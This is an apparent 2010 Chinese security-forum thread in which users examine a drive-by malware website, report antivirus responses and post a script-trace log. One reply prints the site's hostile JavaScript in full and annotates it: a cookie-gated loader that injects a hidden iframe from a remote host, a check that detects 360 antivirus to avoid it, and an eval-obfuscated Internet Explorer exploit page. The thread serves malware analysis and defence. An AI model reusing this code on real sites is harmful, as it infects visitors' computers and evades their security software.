查看: 5407|回复: 24
收起左侧

[其它] 很厉害的毒网,请鉴定[挂马][已检测 by 是昔流芳]

  [复制链接]
lianyeguzhou
发表于 2010-7-27 18:06:01 | 显示全部楼层 |阅读模式
本帖最后由 是昔流芳 于 2010.7.27 18:09 编辑

hxxp://www.a67.cn/g/
枫树,ess 拦截

nis,微点驻防,无反应
希望能有点人气,呵呵
langzi2009
发表于 2010-7-27 19:19:20 | 显示全部楼层
本帖最后由 langzi2009 于 2010.7.28 16:20 编辑


闪电战
发表于 2010-7-27 19:33:40 | 显示全部楼层
用FF3.6进,卡巴、毒霸、网盾全部没做声
yishuad
发表于 2010-7-27 19:58:55 | 显示全部楼层
好像没问题呀Log generated by yishuad use mdecoder 0.63
[root]http://www.a67.cn/g/(武汉光辉广告制作部)
    [script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as
        [iframe]http://ad6.alimama.vu.cx:171/360/index.html?id=124
    [script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as
    [script]http://www.a67.cn/g/menu/menu_func.js
    [script]http://www.a67.cn/g/menu/menu_init.js
    [script]http://www.a67.cn/g/css/membed.js
    [iframe]http://www.a67.cn/*.htm
    [script]http://www.a67.cn/g/gb2big5.js
    [script]http://www.a67.cn/g/menu/menu_content.js
    [script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as
    [script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as
    [script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as
    [script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as


救命稻草
发表于 2010-7-27 22:01:12 | 显示全部楼层
本帖最后由 救命稻草 于 2010.7.27 22:09 编辑

回复 2楼 langzi2009  的帖子



先是恶意网址拦截



点继续访问后其它模块没报,但监控报了


浩宇瀚海
发表于 2010-7-27 22:27:59 | 显示全部楼层
费尔KILL,网盾报安全
e54hacker
发表于 2010-7-27 22:52:56 | 显示全部楼层
  1. <html>

  2. <head>
  3. <script>
  4. var self_url = document.location.href.toLowerCase();
  5. var strid = new Array();
  6. strid = self_url.split("?id="); //如果URL地址中?id=10,所以这里的值你要用10来分析
  7. var id = strid[1];
  8. if(id == null)
  9. id = 0;

  10. var IsSucc;

  11. document.writeln("<script src=\'chk.php?id=" + id + "\'><\/script>");
  12. //document.writeln("<script src=\'safe.js\'><\/script>");

  13. </script>
  14. </head>

  15. <body>
  16. <script>
  17. window.onerror=function(){return true;}


  18. document.writeln("<iframe id='myboom' src='about:blank' width=100 height=110><\/iframe>");

  19. if(document.cookie.indexOf("IsGone=")==-1)
  20. {

  21. var expires=new Date();
  22. expires.setTime(expires.getTime()+24*60*60*1000);
  23. document.cookie="IsGone=Yes;path=/;expires="+expires.toGMTString();


  24. boom();

  25. var tj_num = "";

  26. //IsSucc = false;//no ip

  27. if(IsSucc == true)
  28. {
  29. if(id >= 100 && id <=102)
  30. tj_num = "1811943";
  31. else
  32. if(id >= 106 && id <=199)
  33. tj_num = "1811943";
  34. else
  35. if(id >= 1000 && id <=1010)
  36. tj_num = "1720187";
  37. else
  38. if(id == 104)
  39. tj_num = "1816435";
  40. else
  41. if(id == 105)
  42. tj_num = "1816440";

  43. //下面是特殊的
  44. if(id == 7002)
  45. tj_num = "1770963";


  46. }

  47. document.writeln("<script type="text/javascript" src="http://js.tongji.linezing.com/1720199/tongji.js"><\/script>");



  48. if(IsSucc == true)
  49. {

  50. document.writeln("<script type="text/javascript" src="http://js.tongji.linezing.com/"+tj_num+"/tongji.js"><\/script>");

  51. if(id == 103)
  52. {
  53. document.writeln("<script src='http://s15.cnzz.com/stat.php?id=2325691&web_id=2325691' language='JavaScript'><\/script>");

  54. }

  55. document.writeln(IsSucc);
  56. }


  57. }




  58. function boom()
  59. {

  60. var url = "boom-2.html?id=" + id;
  61. var ifra = document.getElementById("myboom");
  62. ifra.src = url;

  63. }

  64. </script>
  65. </body>
  66. </html>
复制代码

以上是检测代码
以下是静态对抗杀软代码,如果检测到360就不加载恶意代码,如果没有检测到就继续
  1. var bSafe = true;
  2. function openWin() {

  3.   knownImg = {}
  4.   knownImg.resList = [
  5.   {id: 'c1safe', res: 'res://c:\\Program%20Files\\360\\360Safe\\repairleakdll.dll/GIF/154'},
  6.   {id: 'd1safe', res: 'res://d:\\Program%20Files\\360\\360Safe\\repairleakdll.dll/GIF/154'},
  7.   {id: 'e1safe', res: 'res://e:\\Program%20Files\\360\\360Safe\\repairleakdll.dll/GIF/154'},
  8.   {id: 'c2afe', res: 'res://c:\\Program%20Files\\360Safe\\live.dll/#2/#203'},
  9.   {id: 'd2safe', res: 'res://d:\\Program%20Files\\360Safe\\live.dll/#2/#203'},
  10.   {id: 'e2afe', res: 'res://e:\\Program%20Files\\360Safe\\live.dll/#2/#203'}
  11.   ];
  12.   knownImg.ok_resList = new Array();
  13.   knownImg.tmp_resList = new Array();
  14.   knownImg.checkSoft = function(){
  15.    if (document.all){
  16.     x = new Array();
  17.     for (i = 0; i < knownImg.resList.length; i++){
  18.      x[i] = new Image();
  19.      x[i].src = "";
  20.      knownImg.ok_resList.push(knownImg.resList[i].id);
  21.      x[i].onload = function(){
  22.      //alert(knownImg.resList[i].id + ': return true');
  23.      }
  24.      x[i].onerror = function(){
  25.      //alert(knownImg.resList[i].id + ': return false');
  26.      knownImg.ok_resList.pop();
  27.      }
  28.      x[i].src = knownImg.resList[i].res;
  29.     }
  30.    }
  31.   }
  32.   knownImg.checkSoft();

  33.   if(knownImg.ok_resList.length>0)
  34.   {
  35.    //alert(knownImg.ok_resList);
  36.    //document.write('finded:<br />'+knownImg.ok_resList.join('<br />'));
  37.    bSafe = false;
  38.   
  39.   }else{
  40.    //alert('no');
  41.    bSafe = true;
  42.   }
  43.    
  44. }
  45. openWin();

复制代码
总的代码里包含了Cookie,24小时内只加载一次代码,静态对抗杀软方法,至于网马的位置,关键的的地方是
  1. var url = "boom-2.html?id=" + id;
  2. var ifra = document.getElementById("myboom");
  3. ifra.src = url;
复制代码

这里包含了一个id,id是一个变量,尝试下从代码里找

  1. if(id >= 100 && id <=102)
复制代码

如果id大于等于100,小于等于102
我们假设id=100得到url
  1. hxxp://ad7.alimama.vu.cx:171/win7/boom-2.html??id=100
复制代码
得到代码


  1. <HTML>
  2. <BODY><BUTTON id=aaa style='DISPLAY: none' onclick=a1();></BUTTON>
  3. <script language="JavaScript">
  4. var self_url = document.location.href.toLowerCase();
  5. var strid = new Array();
  6. strid = self_url.split("?id=");
  7. var id = strid[1];
  8. document.writeln("<script src=\'"+id+"/a.jpg\'><\/script>");
  9. </script>



  10. <script src='pps.js'></script>
  11. <SCRIPT language=javascript>
  12. var a4 = YTshell;
  13. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9 a(){8();7 0=4.5(\'6\');0.b(\'#c#i\');4.f(0);d{0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1)}h(e){}1.g+=\'\'}',19,19,'a7|window|setAttribute|s|document|createElement|body|var|ac2|function|a1|addBehavior|default|try||appendChild|status|catch|userData'.split('|'),0,{}))
  14. document.getElementById('aaa').onclick();
  15. </SCRIPT>
  16. </BODY></HTML>
复制代码
  1. document.writeln("<script src=\'"+id+"/a.jpg\'><\/script>"); //这里a.jpg就应该是100a.jpg因为上面的id=100
复制代码
以上是个人看法,如果有说错的地方,还望大牛指正!



评分

参与人数 2经验 +6 收起 理由
Hopesky + 5 版区有你更精彩: )
是昔流芳 + 1 版区有你更精彩: )

查看全部评分

langzi2009
发表于 2010-7-28 00:25:17 | 显示全部楼层
随缘9688
发表于 2010-7-28 00:31:30 | 显示全部楼层
辛达
发表于 2010-7-28 09:24:32 | 显示全部楼层
回复 7楼 e54hacker  的帖子

很久没有看到这么详细的分析了。膜拜大牛

   
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-19 10:16 , Processed in 0.119768 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表